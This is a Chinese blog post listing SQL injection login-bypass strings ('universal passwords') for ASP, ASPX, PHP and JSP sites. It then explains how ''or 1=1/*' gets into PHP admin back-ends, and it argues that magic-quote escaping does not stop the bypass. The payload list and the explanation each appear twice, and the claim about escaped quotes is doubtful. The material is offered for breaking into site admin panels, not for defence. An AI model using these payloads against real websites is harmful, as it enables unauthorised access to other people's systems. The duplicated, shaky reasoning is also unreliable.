网站万能密码收集与php万能密码详解
2013-05-13 09:39
281 查看
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
自己也有过收集,别人总结的我又添加了几个
asp aspx万能密码
1:”or “a”=”a
2: ‘)or(‘a’='a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a'=’a
8:”or”=”a’='a
9:’or”=’
10:’or’='or’
11: 1 or ’1′=’1′=1
12: 1 or ’1′=’1′ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ‘ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1
17..admin’ or ‘a’='a 密码随便
PHP万能密码
‘or 1=1/*
User: something
Pass: ‘ OR ’1′=’1
jsp 万能密码
1′or’1′=’1
admin’ OR 1=1/*
自己也有过收集,别人总结的我又添加了几个
asp aspx万能密码
1:”or “a”=”a
2: ‘)or(‘a’='a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a'=’a
8:”or”=”a’='a
9:’or”=’
10:’or’='or’
11: 1 or ’1′=’1′=1
12: 1 or ’1′=’1′ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ‘ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1
17..admin’ or ‘a’='a 密码随便
PHP万能密码
‘or 1=1/*
User: something
Pass: ‘ OR ’1′=’1
jsp 万能密码
1′or’1′=’1
admin’ OR 1=1/*
说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了 PHP注入。 其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。 其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。 如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。 PHP注入时我常用的万能密码是:'or 1=1/*. 那我们分析一下为什么这可以进后台。 如果sql语句这样写:"SELECT * FROM admin where name='".$_POST['name']."'and password='".$_POST['password']."'",那我们在帐号处输入万能密码'or 1=1/*,密码随便输,sql 语句就成了select * from admin where name='’or 1=1/*' and password='任意字符'。 /*为mysql的注释符,说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了 PHP注入。 其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。 其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。 如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。 PHP注入时我常用的万能密码是:'or 1=1/*. 那我们分析一下为什么这可以进后台。 如果sql语句这样写:"SELECT * FROM admin where name='".$_POST['name']."'and password='".$_POST['password']."'",那我们在帐号处输入万能密码'or 1=1/*,密码随便输,sql 语句就成了select * from admin where name='’or 1=1/*' and password='任意字符'。 /*为mysql的注释符,这样后面的东西就都被注释掉了,也就是为什么密码随便输的原因。 假设GPC转换没有开启,那么请看:where name='’or 1=1(*/后面的东西被注释掉了), name='’的逻辑值为假,而后面的1=1逻辑值则为真,对于整体就成了假 or 真,最终的逻辑值 还是真,就进后台了。 那么如果GPC转换开启了,就对单引号进行了转换。语句就变成了where name='\’or 1=1,在 看一下和刚才有什么区别,无非是多了个\。name='\'与name=''的逻辑值一样,都为假,那1=1 为真,总的sql语句的逻辑值不还是真吗?那有进不去后台的理由吗? 所以总的来说,php网站的万能密码可以这样写:'or 1=1/*,而GPC转换是否开启对它没有任 何影响! 所以请改变你的想法:存在字符型注入的php网站是可以用万能密码'or 1=1/*的这样后面的东西就都被注释掉了,也就是为什么密码随便输的原因。 假设GPC转换没有开启,那么请看:where name='’or 1=1(*/后面的东西被注释掉了), name='’的逻辑值为假,而后面的1=1逻辑值则为真,对于整体就成了假 or 真,最终的逻辑值 还是真,就进后台了。 那么如果GPC转换开启了,就对单引号进行了转换。语句就变成了where name='\’or 1=1,在 看一下和刚才有什么区别,无非是多了个\。name='\'与name=''的逻辑值一样,都为假,那1=1 为真,总的sql语句的逻辑值不还是真吗?那有进不去后台的理由吗? 所以总的来说,php网站的万能密码可以这样写:'or 1=1/*,而GPC转换是否开启对它没有任 何影响! 所以请改变你的想法:存在字符型注入的php网站是可以用万能密码'or 1=1/*的
相关文章推荐
- 网站万能密码收集
- 分析PHP网站下的万能密码
- 网站分析数据收集方式详解
- PHP网站编程:密码嗅探
- PHP外部调用网站百度统计数据的方法详解
- php网站密码md5加密串比较方式
- PHP更安全的密码加密机制Bcrypt详解
- 以Apache服务器、php语言为例 详解动态网站的访问过程
- (php脚本自研分享)•通用型保存网站用户密码到css文件
- php的password hashing(密码加密详解)
- 网站分析数据(即用户行为数据)的三种收集方式详解
- 网站万能密码
- 【Discuz】打开网站提示Oops! System file lost: class/class_mysqli.php无法进入论坛与输入密码错误多次被禁止尝试
- PHP万能密码
- PHP万能密码登陆
- 网站万能密码大全
- 详解PHP处理密码的几种方式
- 收集的php编写大型网站问题集
- 以Apache服务器、php语言为例 详解动态网站的访问过程
- WAMP配置详解 - Windows上的PHP网站。